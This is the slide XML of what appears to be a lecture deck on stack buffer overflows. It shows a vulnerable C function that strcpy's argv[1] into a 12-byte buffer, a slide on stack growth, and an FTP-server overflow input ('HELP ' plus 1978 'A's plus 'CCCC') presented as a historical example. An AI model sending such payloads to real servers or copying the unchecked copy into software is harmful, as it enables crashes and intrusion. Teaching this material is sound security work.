          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666440" y="356760"/>
            <a:ext cx="9645120" cy="699120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Buffer overflow vulnerabilities: stack memory allocation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1560600" y="1942920"/>
            <a:ext cx="5724720" cy="369000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="498" name="Picture 20" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3125160" y="1244520"/>
            <a:ext cx="6372720" cy="5033880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3260880" y="1442520"/>
            <a:ext cx="6028200" cy="3862440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln w="19080">
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454560" y="1620360"/>
            <a:ext cx="7372080" cy="3382200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>#include &lt;string.h&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> foo </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>bar</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> c</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="ff8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> bar</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>// no bounds checking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>nt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> main </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> argc</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="8000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="ff8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="ff8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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1" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838880" y="316800"/>
            <a:ext cx="9645120" cy="699120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Buffer overflow vulnerabilities: stack grows down</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="502" name="Picture 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435720" y="1091880"/>
            <a:ext cx="4598280" cy="5437800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="503" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1659240" y="1207800"/>
            <a:ext cx="3764520" cy="5379840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="504" name="Picture 11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5245200" y="2547720"/>
            <a:ext cx="1990080" cy="1758960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036800" y="1836360"/>
            <a:ext cx="505080" cy="2010600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="d6f5ff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Stack growth</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644480" y="2985840"/>
            <a:ext cx="430560" cy="1320840"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="39ceff"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="85e0ff"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10211040" y="2869200"/>
            <a:ext cx="417240" cy="1437480"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="39ceff"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="85e0ff"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10643040" y="898200"/>
            <a:ext cx="505080" cy="2559240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="d6f5ff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Memory addresses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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9" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1418040" y="159120"/>
            <a:ext cx="10400760" cy="1245240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Stack overflow vulnerabilities: a “hello world!” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>                                                                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>example (2001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7306920" y="2145240"/>
            <a:ext cx="3848400" cy="3165840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Send "HELP " + (“A” x 1978) + “CCCC\x00\x0D\x0A” to FTP server without logging in and see what happens…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="511" name="Picture 25" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="482040" y="1620000"/>
            <a:ext cx="6341760" cy="4575960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="512" name="Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8134560" y="4038840"/>
            <a:ext cx="2538000" cy="2261880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:transition>
    <p:fade/>
  </p:transition>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8"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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2" presetSubtype="9">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="512"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
